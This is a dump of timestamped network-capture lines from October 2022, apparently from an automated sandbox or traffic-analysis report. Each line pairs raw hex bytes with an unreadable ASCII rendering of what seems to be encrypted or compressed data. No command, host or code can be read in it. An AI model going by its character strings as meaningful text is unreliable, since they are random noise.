                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17688INData Raw: 97 09 9c cf 95 21 ec d4 18 61 88 df 35 85 2a 00 7e 92 84 ac e6 2d da cd 39 7c 8b 6f c7 ce 9a 9b d2 ae 87 78 90 f6 61 4a 96 df 23 06 4d a0 3f 12 44 01 af 24 ba 6e 4d 80 84 63 7e b2 da 01 47 df 9a 3b 9b 4f 20 47 18 80 0c e5 18 9f ec 73 70 b5 93 10 9e 3f 98 fa 61 93 2e b7 81 b6 bf ab 0b 4a 7f 86 72 89 cf 81 3f a1 c9 03 92 c5 5c 81 72 70 70 df ba 3a 89 91 2e 81 7e 51 ab 94 1d f3 81 9c 1d bc 06 0b 54 17 91 33 be b1 a4 73 c7 07 25 66 06 ba fa 88 fd 5a 75 eb b6 bf 1f ae 68 48 5b ed 92 48 00 f5 42 f8 71 3e 19 e8 e3 31 a2 ac 71 9d 06 15 aa cb 47 a9 62 c5 5e 4c 27 5d b3 0c b1 2b c5 e7 80 f2 f5 8f 0c 22 d5 8a 60 42 ce 51 be 8a c2 c4 bd b4 23 82 d0 45 86 2f 47 74 cd 6c ab f9 73 21 a1 1f 8a b4 d7 78 93 3a 08 e4 0b 6b 8c 95 29 94 48 77 93 2f 15 23 f4 12 5d 90 7c f8 a0
                                                                                                                                                                                                                                    Data Ascii: !a5*~-9|oxaJ#M?D$nMc~G;O Gsp?a.Jr?\rpp:.~QT3s%fZuhH[HBq>1qGb^L']+"`BQ#E/Gtls!x:k)Hw/#]|
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17704INData Raw: 60 e1 9c 42 05 93 eb f1 5e b4 bf 2b 45 86 9e 0e 7d 29 8b 2a c6 d9 aa 2e d6 28 b3 22 dd 0f 7d 3a 09 77 7e 17 80 e4 8c a1 20 35 fa 8c fc 68 fd cc 97 48 a5 75 51 b6 38 88 4f f7 2f 98 7f a0 18 05 30 ea 36 5d 5c 03 85 2b 9e ce 7a ce e4 b8 aa d6 30 86 22 de 94 52 f8 54 1e ab 34 a5 f6 f0 ff 32 20 30 d7 4b 30 14 d9 7f 8a 95 53 98 b9 c6 25 5e c9 21 e2 c6 94 96 9f 59 6d 81 9b 25 23 e0 7a 05 a0 8a 40 f3 d8 6c 22 c2 7b 67 2c 76 10 64 20 69 0b 32 0c 20 88 c5 73 d4 24 a3 f5 be 9f 84 a0 b8 bd d4 2a fb 04 20 d9 49 ba 60 41 83 a9 4f ab 4d 01 5f f7 9b 86 37 f5 75 71 11 c1 fa 07 bc d6 d4 3b 67 30 a7 03 30 5d f7 57 0f dc 31 84 60 57 de ec f5 83 e8 1f 14 e8 95 10 6a c0 5d 8e d5 33 44 25 6e d1 b2 6f 13 1e e1 c8 6c f1 13 89 80 f9 e3 04 b8 a9 b1 4c de 14 16 e4 11 ed d1 d3 74 78
                                                                                                                                                                                                                                    Data Ascii: `B^+E})*.("}:w~ 5hHuQ8O/06]\+z0"RT42 0K0S%^!Ym%#z@l"{g,vd i2 s$* I`AOM_7uq;g00]W1`Wj]3D%nolLtx
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17720INData Raw: b9 25 33 26 26 9e c8 b3 05 f7 7b 60 d7 d3 29 d1 78 c0 c4 8a 03 a3 e8 f3 07 b9 d2 ee 03 f9 59 ba e8 98 61 b5 aa 0d e9 05 d4 3b af a7 c9 b0 ed ce 7a c0 52 0d c3 02 2a 18 aa d1 b2 b0 98 21 ea 04 d8 f1 ac e2 d4 a7 ca 97 ed 83 75 a9 63 46 49 f4 b1 07 c7 6a 2f 90 eb 96 8b 98 a5 f2 75 4a fb 0c e9 a3 73 be df ad 5c dd f0 2d 4e 69 fc 3b 9b 3e 93 3b 30 a5 fa 5e b3 b0 6c a7 f6 5a 22 32 bf 65 52 23 c3 88 05 7e 65 d7 c0 f8 49 3b 75 9e 7c 3b c3 6f e2 ce c8 0f b9 3c 33 4e f4 11 9f 26 3f 1a 3c 9c 80 95 cc 52 20 c9 3a 7e 28 4e 1e 2e 65 88 36 4b 2e 72 c7 ed 22 f6 48 cd 2d ba c4 7a e7 3c 3f 1b c8 62 d8 a0 bd c6 d4 d6 a0 90 0e 36 79 1a d5 26 9c 41 94 c0 ae 2c f9 5a d7 c1 8b ca 94 ea 2e 31 5f a4 49 1e a6 e9 a0 1b 5f 71 9d 25 7f 54 b3 a1 22 51 eb 32 26 99 6b 5c 6a 2c 89 9e cb
                                                                                                                                                                                                                                    Data Ascii: %3&&{`)xYa;zR*!ucFIj/uJs\-Ni;>;0^lZ"2eR#~eI;u|;o<3N&?<R :~(N.e6K.r"H-z<?b6y&A,Z.1_I_q%T"Q2&k\j,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17736INData Raw: c8 2f 59 6b 86 f1 0a dc 63 3b 09 6e df 89 d3 94 d6 a8 57 b2 b8 e3 f8 36 da 8b 99 59 47 0b b0 0b 2e 74 59 14 76 45 7d 84 04 3b 32 a7 c2 1d ba a9 81 d5 e3 15 9b d7 2a f6 79 67 50 ec 7b f5 8a 98 ee c1 0e de 34 c4 d1 b7 5a 74 a0 fe 3c 03 d2 73 b6 78 ce 41 d4 9a 9d 07 23 7b a1 fa df 52 57 e6 39 3e e0 98 df 26 12 d1 db cc 21 d4 60 92 46 17 13 df 43 b0 41 a9 19 6d 0b 51 b2 53 32 fd 73 15 41 6d 1f 58 bf 59 cb b4 28 81 c2 2b 46 12 55 51 76 b9 b3 c6 26 3c c0 7d d0 71 3f 9a c8 79 f7 a1 05 07 6b a0 71 36 49 a0 6c 73 dd ec 96 de 70 7a 50 0e 39 40 bf 26 33 0e 25 f8 4c 04 48 d0 3b a3 e0 91 c9 87 73 35 24 41 55 59 bb 3f a8 44 5e 62 1b 46 f9 7d 13 79 67 3b 65 55 f5 0d a9 c2 03 db ad ef 1e 92 cf fb 19 96 0d e8 79 7f 3d 2a 0d 60 e9 4e 18 e0 c0 09 be 1f 28 23 c1 c3 94 46 1a
                                                                                                                                                                                                                                    Data Ascii: /Ykc;nW6YG.tYvE};2*ygP{4Zt<sxA#{RW9>&!`FCAmQS2sAmXY(+FUQv&<}q?ykq6IlspzP9@&3%LH;s5$AUY?D^bF}yg;eUy=*`N(#F
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17752INData Raw: 04 90 5d 69 83 b9 10 51 ca bf d6 03 17 c9 27 cd 71 5e 2e 36 58 78 8f cf bb 92 ce ac f6 4b 6e 9a 00 60 0a 8e 05 6e 91 b5 a5 35 26 d3 53 b3 c9 d4 ef fb fb ca aa 2f 16 f9 81 85 eb 82 93 f5 4e 95 50 7f c5 9c e5 ad ac 76 ff ff 99 33 0d 7f b5 eb 11 2b 01 1d e4 51 ea 79 32 f9 47 a6 5d 04 ea f0 fd d9 e8 19 08 4d 3a 7f 7c 81 3e 72 00 ae f4 6e e7 8d b8 0f bf be d1 3f 53 75 6d cb 40 57 40 68 6d 99 ac ee 1b 2e de 97 3a 14 c4 c4 fd 42 a7 d6 f2 02 66 95 08 69 ac d4 7b 1a ba 6a cd 63 51 2e 62 e2 3e e6 e7 a2 09 69 a8 e0 6c e6 f6 38 7b 67 7b a9 e1 81 ee 89 8e 72 5e 7a e1 52 8b 2d 83 e4 9f 4c 87 ca 63 13 f4 6b fa e7 45 f5 4a a5 52 74 d8 f6 f9 e6 3c e9 31 e0 7f 75 7d 5c b2 f0 73 01 42 7a 73 e5 01 bb 3e 6c a5 e2 42 65 f8 1b db a0 52 2d 7d 32 02 0a 69 09 da 49 6b f8 e5 bf 7f
                                                                                                                                                                                                                                    Data Ascii: ]iQ'q^.6XxKn`n5&S/NPv3+Qy2G]M:|>rn?Sum@W@hm.:Bfi{jcQ.b>il8{g{r^zR-LckEJRt<1u}\sBzs>lBeR-}2iIk
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17768INData Raw: 3f ef 46 68 78 56 11 62 66 56 c6 5c d5 1e be 4a 2b e7 7a fa ab a8 fc b0 37 7f 04 76 a0 ea f4 a7 d6 fa ac 28 67 13 13 a5 dd 3b 14 08 9f fe 04 14 4c d5 a3 12 dc 92 f8 f8 ea 38 0f 8e e1 1a b3 52 74 bd 97 ea 79 cd 0f 10 bc 8e 89 54 22 b5 9a c0 c5 64 f7 ea 29 1b 05 4f 2c dc 94 72 a7 93 a1 43 7c 20 57 51 15 d7 31 8b c8 4b 22 f6 4b 75 f1 a7 2c 25 51 5d 0a e8 cb 6d fc 4b 15 22 65 57 3e ad 9c 2b 3e 11 84 8a fe 0b 3d 6c 80 08 13 fa ea 84 b7 9e 96 4c c5 a8 02 b8 f5 e0 27 64 fd 1c 8f 9c 20 e4 78 3c ed 6e ed c4 9e 7e 24 3b 84 2d 9a ab 84 c5 a8 d9 cc f1 1a 05 00 6b c9 cc 7e a9 1a c9 0f e3 8a 57 e8 72 5e 25 e8 da 11 5b f9 8b d2 e1 e5 7a cd a2 47 b2 ff f0 96 8d 91 95 1f 86 f4 00 1f 84 af 73 3f 8c 11 79 38 2d ed 61 68 27 40 3b 1f 2b 4c 86 80 97 5f af 5c c9 a4 08 9e fd 26
                                                                                                                                                                                                                                    Data Ascii: ?FhxVbfV\J+z7v(g;L8RtyT"d)O,rC| WQ1K"Ku,%Q]mK"eW>+>=lL'd x<n~$;-k~Wr^%[zGs?y8-ah'@;+L_\&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17784INData Raw: 83 07 5f d8 e7 23 0a aa e9 d1 77 79 fa a8 2b d2 22 af 15 7c a6 84 c6 33 7b e5 e8 32 f2 25 5e b3 2d ed 80 cb a7 2b 07 12 7a 99 30 62 20 ef 11 19 a9 4b ab 22 eb d8 06 ac 93 61 15 f8 b4 88 8e 51 a0 11 5f 27 b5 7f e7 03 a9 f4 86 d1 dc da f0 cf f8 8f 2b 92 8c 27 dc 18 3c f7 c6 ed ef 3e 84 d7 19 33 12 2b a5 88 cd 58 a9 5a 4d 84 f0 a6 96 40 dc e1 62 dc b2 44 dc 11 9b 27 89 71 53 73 c2 53 8f a2 bc c4 d3 fe 58 a5 73 55 7f 4a 26 10 d6 ad a0 16 d2 dd 03 9f 0b bd 2a 17 96 55 cb e0 d8 9f d5 ac d2 88 0a d8 08 9c ad 48 b8 ce 7b ba a5 fc f5 01 76 e0 24 41 eb 5d 47 98 dc a5 a1 a5 be 45 ff d3 37 96 f2 df 02 2c b8 5e 4a aa 1a 62 11 1b dd b5 76 64 c5 85 30 bc 5b dc ef 26 db 74 40 12 4d 9c 9b f1 44 81 83 80 47 b1 97 f4 17 6b 66 22 ea c5 50 d3 5f 7d 2f ca 66 19 c0 5f 9f ac 5f
                                                                                                                                                                                                                                    Data Ascii: _#wy+"|3{2%^-+z0b K"aQ_'+'<>3+XZM@bD'qSsSXsUJ&*UH{v$A]GE7,^Jbvd0[&t@MDGkf"P_}/f__
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17800INData Raw: 84 3e 11 2b 98 fb 80 f1 9a 2f 9c f4 37 aa 11 a8 18 39 aa bd c4 1d 1a 87 2a ce 0e cb bd d8 ef 8f c1 27 a1 69 2e 17 72 8e f8 c0 e8 aa ce 68 9a 37 a8 e2 fe 79 ad 80 34 da 85 ef fe 60 4a 95 6a 8c 34 ad 32 7e 26 47 eb 68 10 98 1b 09 7c aa 37 c5 ef 8d ad a8 55 cf 2c e3 28 3c 72 82 6d d4 e8 9d 16 dc 4a 65 dc 91 35 9b 33 52 0a dd 13 22 dc 58 f1 9e 9d 68 01 f9 e6 a8 60 f1 e4 82 92 e3 9a ba 15 90 0e 0e c1 90 70 48 a1 48 61 b6 c4 bf 64 39 ba 87 21 10 46 e0 cb 07 7a 9a da 41 b3 aa 54 28 63 31 82 db 16 9a ca 85 5f 6d d5 ee 50 ce 5d 6d f1 f4 82 32 03 47 96 09 7b 3c ee 2c d9 40 1f 95 1c 88 0c e3 c0 e8 e5 4b 75 18 3b f2 7b 0f f2 a9 8f 4b 02 ca 17 18 3a 93 b1 b1 4a 30 06 8e 03 30 5a 69 e2 3a 75 d1 d3 10 d2 e6 15 92 24 69 dc 73 1d 51 41 c8 51 72 cd 09 55 92 11 db eb ab a3
                                                                                                                                                                                                                                    Data Ascii: >+/79*'i.rh7y4`Jj42~&Gh|7U,(<rmJe53R"Xh`pHHad9!FzAT(c1_mP]m2G{<,@Ku;{K:J00Zi:u$isQAQrU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17816INData Raw: e8 7f 3f 4e 44 67 63 b3 07 cb 45 2b 2e 8f 61 68 4d d9 86 9b 20 5b 57 77 ae c5 85 be 90 13 09 c3 60 c4 46 b3 15 e5 a2 d3 4b 88 7f b9 af 58 bd 58 04 53 b1 0b ce b6 cb ce 76 08 e7 63 11 f3 5e d9 25 3d 8c 19 f2 53 da ef a0 4a 6a 6a 96 32 6b 1d 46 2a 31 f4 cb f7 c9 59 f0 a8 f5 34 30 7a e4 34 dd 84 b0 1b 85 84 bb cb e9 17 fb ea 2c 36 3b 04 f0 e8 05 de 4a aa 47 8f 39 d4 db 8f d6 5a 97 fe 90 a6 ca 9c c7 bc c6 ae a8 71 dc d4 6b 99 0a 36 ee 6a f8 15 80 cf f8 7b 58 83 98 ff 94 53 a0 41 ab 89 f9 38 07 19 40 25 ac 88 c9 11 53 70 4f e0 3c bc d5 57 2a 40 6a d3 dc 32 56 ca 01 e3 a5 e5 b0 70 9b 6b a7 ac fb 7a 58 49 4c 62 3a 8f 3c 13 71 5c a1 4e 56 01 9e 22 3d 22 61 4c 46 c1 fb df da 8d 8c bb 48 12 b9 1a ee f9 25 4d d9 60 75 69 c9 6f 34 c2 2b 1c b1 61 cf 06 d3 d7 98 72 30
                                                                                                                                                                                                                                    Data Ascii: ?NDgcE+.ahM [Ww`FKXXSvc^%=SJjj2kF*1Y40z4,6;JG9Zqk6j{XSA8@%SpO<W*@j2VpkzXILb:<q\NV"="aLFH%M`uio4+ar0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17832INData Raw: 67 de cb f2 06 79 e6 fb b9 90 44 e1 b9 60 33 a4 1f 6b ed 6e 67 99 c2 66 05 c0 24 9a d7 44 8c 98 5a 02 1f 53 de d7 f6 55 2e 7d 49 e4 ca 99 9b 51 0f 8c 3d 22 35 44 33 30 a3 2c bf 90 75 f9 50 c2 f6 e0 d4 d4 4e e5 21 dc c9 32 f5 4a 96 f2 ca 43 6a d6 46 88 20 62 b9 07 2f 23 50 7a b8 d1 4b 15 98 05 98 c2 a9 8a 65 9a 00 da a7 2f 01 0d 83 52 8f 5b 8a 09 81 4f 24 29 9c 75 da 5b e0 4c dd 60 73 9e b1 bc e4 53 f8 05 ab f4 62 fa 5a cd b0 df 07 77 4f 57 29 93 aa c6 ab 8f 72 dc 7f e9 03 1a d0 3c c6 8a 69 71 39 33 59 51 69 1b e3 dd b5 1d 42 4a b0 93 38 1b 10 91 53 78 ad 8d c2 d9 77 7a 99 8d cf 52 2b 84 cc 59 7b 64 06 fa e5 b1 5d ab b3 ac fc 73 ae c2 ae 85 a6 04 a6 72 b0 1d 20 59 76 0c 39 35 bc 15 23 c5 46 10 28 a2 70 72 ee df a9 fe 50 63 23 e2 ea a6 80 b1 29 f2 f3 be 53
                                                                                                                                                                                                                                    Data Ascii: gyD`3kngf$DZSU.}IQ="5D30,uPN!2JCjF b/#PzKe/R[O$)u[L`sSbZwOW)r<iq93YQiBJ8SxwzR+Y{d]sr Yv95#F(prPc#)S
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17848INData Raw: b0 d5 44 22 78 12 4e 94 2a 6f 95 f4 e3 3e f1 91 54 6c ff 8a b1 e0 75 c0 7a 4e 07 54 45 55 cf 6a fe 94 5d d7 be 0d 5b a4 68 f1 00 03 1c ef 70 d5 0d 80 4c 8a 03 0e 6c a4 bc 64 b7 f0 b3 fc 55 c3 84 88 59 80 42 ec 1c af 50 38 a1 3a d9 59 80 0c 70 88 5f 28 20 01 3e b0 ba f9 24 a1 44 4e 6f 36 a9 7e b6 fb 3c 33 c8 ed 5c 58 3f 28 ba 3a be 26 19 1a ac 42 4a 7a a5 7a d9 1c da c1 c6 1a cf 91 29 c4 73 3b df ef 96 6d 9b 16 3b d9 de f4 f9 3e d1 a0 a5 c9 b1 2c f6 69 60 1d 5e 82 32 2a 0b 58 84 56 5d 89 9a 0c 76 c9 a1 f8 d4 ef 55 31 3b 02 b4 dd ff 9e 2d e4 24 d3 6f 8d 39 bc 0d a2 77 7b 5f b4 fe 1a 3c 0f 81 54 85 e5 f5 1a 97 24 ff db 82 69 14 fd 76 87 9a 4c 90 ef c0 13 2f 3f 92 13 35 d0 cb e0 2b 6e 4d b0 11 28 7d e6 46 2d 46 a8 43 f2 ae 41 4a 58 06 69 78 d1 07 ab de c8 c0
                                                                                                                                                                                                                                    Data Ascii: D"xN*o>TluzNTEUj][hpLldUYBP8:Yp_( >$DNo6~<3\X?(:&BJzz)s;m;>,i`^2*XV]vU1;-$o9w{_<T$ivL/?5+nM(}F-FCAJXix
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17864INData Raw: 45 00 d1 f4 67 ae 21 74 9c 1d 40 5d 6c aa 90 54 57 74 0b ee 23 88 ab ef 70 0c ea 32 be 91 dd b9 e1 a5 fc 96 38 13 fd f0 89 3d e5 44 b6 e1 ff b6 00 eb 72 0d 87 52 03 b4 6e e8 f3 28 72 e9 da 21 ba 55 66 e8 f3 34 1f f8 86 7a 05 4a b5 22 ef 8a 2a 2f 84 b8 87 e4 c4 33 f9 83 66 d3 48 0d 71 f7 fa 17 ce 07 2b 45 6b 63 60 2b 10 7d 96 aa 35 b1 5d 54 ce 45 03 5d db 65 75 23 41 6c 70 04 0f 6a 15 15 21 42 1f a9 fc a4 dc e8 11 16 33 8b ca 13 2b 37 1a 99 2a b7 31 55 22 f6 ec 83 88 a4 eb 6d 2b 1d 3d e2 a8 33 96 9b a1 63 9d d2 81 8b 1f 89 09 e4 57 39 d5 88 6c 3d ac 17 45 85 7c 00 9e ea bf 76 87 de 04 0d be ea 32 8e 39 ca 31 4c f5 ab af ab b1 ae c2 8a 7b 82 5e a3 fd 9e d2 be 12 50 05 f5 ad e0 0e 6a 9b d0 61 fa 7c 5f 39 69 61 c2 3a 57 4b 0f 23 8c 01 d0 69 fe 24 e4 5b 17 5a
                                                                                                                                                                                                                                    Data Ascii: Eg!t@]lTWt#p28=DrRn(r!Uf4zJ"*/3fHq+Ekc`+}5]TE]eu#Alpj!B3+7*1U"m+=3cW9l=E|v291L{^Pja|_9ia:WK#i$[Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17880INData Raw: a6 fa 3a cd c4 0a 4d a9 b0 df a5 f7 11 fc cf a7 cb ae 72 a9 eb f8 52 84 e2 b5 1f f4 18 e1 87 0a 3e 3f 6f 57 91 c4 06 b7 f5 b9 f2 08 aa 2e a8 5e 9a a4 09 37 ee 96 8d 7f e2 a2 9f b9 7c 06 82 12 6d d3 a7 4d 59 38 37 a0 a3 f7 9a 09 ae de 98 6a 9c 3e 6f 40 6a e6 e2 9a 6b 3c 52 10 86 c3 ca 35 95 4e 2e a3 ce 9b 35 c8 87 39 8a 6f da 7e f1 7f 43 b9 e2 54 3e c5 6b bf 2e ba 1d c1 80 bf 03 55 72 8f 54 c4 da bd 31 3b 1a b3 5a 2d c6 c0 2b 20 54 f1 7f 94 14 ba 73 b8 28 42 82 f5 1a 57 a4 d0 8b 4a bc 2a 97 34 9f ff ca c6 09 3b 29 0c ee 43 ec 5f 87 e4 1e 5c d1 bb 40 1d f2 8b 89 30 26 16 25 13 90 90 f1 03 5a 00 13 77 ff 2d 8c 25 ad d3 d0 f2 bf 34 2f a0 24 b2 6b 74 ef 90 b3 ee b7 25 0d 2f 6a e0 84 5f f5 03 49 b9 f9 42 0d 75 46 d5 a1 fa 47 51 17 f9 d4 83 e2 7a 9c 6c e8 76 fe
                                                                                                                                                                                                                                    Data Ascii: :MrR>?oW.^7|mMY87j>o@jk<R5N.59o~CT>k.UrT1;Z-+ Ts(BWJ*4;)C_\@0&%Zw-%4/$kt%/j_IBuFGQzlv
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17896INData Raw: 32 f2 f7 89 cd 09 a2 12 c9 93 00 8f 39 d8 ea ce d1 79 c9 4a 94 c0 16 c5 d1 32 82 c9 be a9 e6 2b d8 61 db ae 74 1c cc 4d 9c 89 d8 93 3f 73 87 ac d0 cb 1b 2b db a2 cf c8 4d 04 f5 b0 5a df 71 c7 fc 57 b3 b2 7f 26 34 6a 44 3e 01 a4 3b 42 0d cd b2 42 31 27 dc 4e 6c 0b 6c f8 d6 06 1e bd 8f f6 c2 ff 23 2c bc 5e 44 e6 93 83 dd 55 41 29 7b f5 7d 90 45 bf 31 48 16 5f 69 3f 47 87 19 4c 8e a7 9c 35 09 a7 9d 58 f2 84 7e 24 5b bd 53 83 5f 1d 73 1a 75 f6 8b a8 75 2f f3 b4 87 93 47 2a 68 5b af df 4c 1b 5a c5 b3 aa 12 79 40 58 36 d6 95 c7 d1 04 94 ad 64 f0 b2 ba 8f 85 43 e3 db 65 6f e0 e6 bc 67 92 58 43 66 b7 30 69 bc 74 54 50 3a f5 82 31 9f 3b 42 87 60 04 46 fc 0f b9 d7 61 62 ac 94 ee ca 60 7c 64 66 e5 69 52 1e d0 fb d2 17 7e e8 4c 87 fe ed bd ee c7 d1 a3 6f a4 55 d9 dc
                                                                                                                                                                                                                                    Data Ascii: 29yJ2+atM?s+MZqW&4jD>;BB1'Nll#,^DUA){}E1H_i?GL5X~$[S_suu/G*h[LZy@X6dCeogXCf0itTP:1;B`Fab`|dfiR~LoU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17912INData Raw: c6 25 cb ce 6e b6 b2 8c d4 5b 2c 0e a1 65 e7 6a b7 27 a0 70 72 c1 00 06 1e dc 4a 07 48 d5 f3 51 ed 1c cf d5 c4 4f a3 82 d9 b1 b8 6a 86 10 1b 11 13 2f 17 e5 a8 67 8d 26 5d 9e 19 57 54 91 20 0c 26 2e b5 53 8c 63 08 28 08 b6 29 2a 88 94 b4 52 8a 83 7a a8 b6 09 00 bb 2f 5e 22 f3 eb 82 3b 37 93 04 7b 15 49 4c be 8c b3 18 e3 c4 65 2e bc 97 cb 77 d6 0a 1e 83 1d 13 2c 07 0e ab 55 ed 8d b9 db 68 bc ec 78 58 06 09 cf 6f 20 39 0b f6 38 31 cc 89 b1 ad 49 26 7f 38 a7 e6 53 43 cd f7 9e 23 4e cd 74 fb 36 61 b1 38 df 61 92 63 2b d9 a6 d7 18 e1 d2 6b 83 4d c6 18 c4 06 99 44 b9 1b af 27 1c d1 0c ff 4f 0a d3 69 57 4b 3e bd a1 32 d7 b5 f9 a9 2e 32 24 7c e6 61 84 f9 03 78 0a 74 87 fc 9d d2 42 9c be d4 06 2f ed e4 7e 3b 2e 8e 8a 9c 66 3a 9c a9 12 dc b6 c3 82 0b 9c 56 de 44 86
                                                                                                                                                                                                                                    Data Ascii: %n[,ej'prJHQOj/g&]WT &.Sc()*Rz/^";7{ILe.w,UhxXo 981I&8SC#Nt6a8ac+kMD'OiWK>2.2$|axtB/~;.f:VD
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17928INData Raw: 74 3a 2a be c2 d4 dc 76 58 54 91 0e 66 df 70 20 f5 5a ef a2 e8 a3 c7 4a 86 fe 4e ba b4 d2 88 06 77 e2 3a 99 55 c3 19 0f 58 45 28 7e 6c 44 98 08 05 cf f9 b4 05 fb 9d 1e da a0 2e 46 3f 76 78 9f 4f 2f 09 fb 3c c1 32 87 c9 3f ce 0d fa 9b 27 19 69 3c a2 bf 3d 45 56 77 ef dd 99 26 1a 83 46 4a 89 b2 e9 09 70 a8 e0 58 5d b0 4a fc de 32 26 ff cd d9 c4 56 d2 80 75 4e b8 28 08 b0 b9 d6 7d 21 6c 80 4c 26 46 0e 2d 6b 26 4c 41 8f 47 2b a6 81 91 82 b3 b6 45 1c 95 07 df bd f4 ca 58 92 17 e4 71 8e 0d 57 57 3d a9 24 1c 99 5a ad fe 64 62 f2 4d c1 13 45 77 48 0f e0 a0 4b a2 b0 70 69 e7 ed 6d 50 de 82 ca 82 9a d3 cc aa cd 49 44 8a b7 ec 28 03 a7 c9 da fd 45 a7 70 54 dd 6a 46 e8 6e c4 e9 44 84 3d 0f 03 9e cc d8 b5 77 36 0b 2a f9 70 f3 58 07 7c f8 33 72 d2 ed c6 7f f8 22 37 15
                                                                                                                                                                                                                                    Data Ascii: t:*vXTfp ZJNw:UXE(~lD.F?vxO/<2?'i<=EVw&FJpX]J2&VuN(}!lL&F-k&LAG+EXqWW=$ZdbMEwHKpimPID(EpTjFnD=w6*pX|3r"7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17944INData Raw: ca 99 8b 18 ed 94 01 cf 43 9f 40 5b 53 ab 62 23 c8 d7 05 03 c7 96 0b 8f 56 95 6f 14 7a dd 76 26 d5 0f b1 9f bf 36 ac 31 ed aa 3d 36 cc b1 9c ab 19 be bc 82 90 8c 55 c3 0c d5 a9 ff 01 09 4a 86 09 2c 90 a0 0b 40 e5 4d 19 87 00 1b 11 b3 34 e5 ce 5e 9d d7 72 aa 16 11 2d 76 99 dd eb 5c 41 f5 82 d7 17 5e 76 5b 78 3d 90 4a 66 43 01 f2 8a fd e0 ba 6c d6 b1 77 c2 0b e5 07 4d b4 c4 09 5f f9 ee 37 1d 40 4a 61 13 46 d3 ba ff f8 28 02 d6 8a e9 c7 b2 be 70 f3 f5 8f 12 9c 77 86 d0 fa b7 13 e9 04 bf c6 2e 9c 4f 5e d5 45 30 ef bb 3c ae 71 76 d4 b0 d3 f4 cc 02 f4 a0 b2 b7 42 10 a5 74 24 bf 12 e5 6b 02 32 c2 94 5b 5c 85 2f 4b 00 ac 87 f5 bc 11 c2 65 a9 6b 37 82 e4 5d 8a 3f e7 fd c0 a5 c6 09 13 4c 66 da 09 40 9b da 32 6b a1 83 46 8a 19 8f 93 6f 04 c0 04 48 6d 2b 94 43 15 0c
                                                                                                                                                                                                                                    Data Ascii: C@[Sb#Vozv&61=6UJ,@M4^r-v\A^v[x=JfClwM_7@JaF(pw.O^E0<qvBt$k2[\/Kek7]?Lf@2kFoHm+C
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17960INData Raw: 3b 92 2e 5f 8c 21 55 a0 ee 86 77 92 c6 4b c5 c1 84 41 b6 eb 31 ad 29 c3 71 01 59 8b 2e d2 3b e4 83 14 43 66 df ef f1 ff dc cb d4 87 c1 b9 27 c7 21 a1 2b 17 09 9c b2 1a 79 9d a9 96 87 c7 84 02 d7 b5 05 81 cc 87 d3 b1 5a fc e4 e0 02 fc f6 28 13 3d 8d 88 a0 3f c1 8b 2b e4 27 e8 51 46 39 39 e7 7e ca 9d 18 8e fa 0b ae 0a 4f 1b 4c 5d 20 95 cf 04 4e d0 fd 4f c2 58 41 9e 13 30 13 40 19 41 28 99 43 5e b5 3d 5d 32 a4 44 e4 70 26 95 fc 39 9f c3 a8 33 9a 05 a3 8e 9d d0 a8 38 3b 73 eb f8 3a c7 4a c7 39 8a bf 0a d8 ad 6a 30 14 fd db 42 1d 06 69 1c 6b 53 77 f0 3b d0 90 16 1a c5 15 a2 eb e0 76 87 1a df db 23 b3 5f f1 bd cd fa c8 c9 76 57 be 07 bc 41 12 3c da 66 ce 5d 73 da bf a0 a0 43 67 4a 06 37 50 ba 61 33 b7 0c 20 a3 dc 8b 45 b3 c6 ff 83 0a 48 b5 c5 21 5b 6f bb ec 63
                                                                                                                                                                                                                                    Data Ascii: ;._!UwKA1)qY.;Cf'!+yZ(=?+'QF99~OL] NOXA0@A(C^=]2Dp&938;s:J9j0BikSw;v#_vWA<f]sCgJ7Pa3 EH![oc
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17976INData Raw: e8 61 e0 b2 93 7e 68 b8 2d 96 10 7b 56 f0 41 22 b0 48 48 6e 7f ff b0 2f 6a ea e8 d4 0f 86 cb 2c b5 2e 86 cd c6 46 9b 13 16 18 4c e4 93 1b b6 80 b3 00 94 b7 1f ee 2d 49 62 5e c2 29 e2 15 37 c0 46 08 f7 4a da 4f 75 68 bb f3 dd 87 a5 b6 8a 53 0f e3 c0 0d f6 62 1b b2 39 b0 fd 32 75 97 c4 c0 48 83 51 59 5b 1a 08 6e 07 73 13 31 02 66 89 cc bb 2b 0c a6 67 24 fa 33 f0 ab 34 52 ca e0 6f 2a ed 9f dc 17 68 2d 4c 2f 77 3f 8e fd 74 b4 37 8b 41 5a 59 63 04 d3 0f 99 46 42 63 52 95 ac e1 19 33 53 ac 25 87 d8 bd ce bc 7c ee 57 d0 01 18 0a 79 fd c9 a5 63 11 03 84 39 9a 1e 48 1f 0a 51 5f 68 46 68 81 d6 b2 f0 58 92 18 34 a7 78 33 4c d8 b2 ee b9 46 bd ec 47 be e5 65 9e a3 01 48 3f af 66 49 8c 5a 37 d7 0e d0 2b c1 28 c4 80 60 9f 89 10 8d 61 b3 f9 9e 91 1e fc 5e 47 0d 52 d4 19
                                                                                                                                                                                                                                    Data Ascii: a~h-{VA"HHn/j,.FL-Ib^)7FJOuhSb92uHQY[ns1f+g$34Ro*h-L/w?t7AZYcFBcR3S%|Wyc9HQ_hFhX4x3LFGeH?fIZ7+(`a^GR
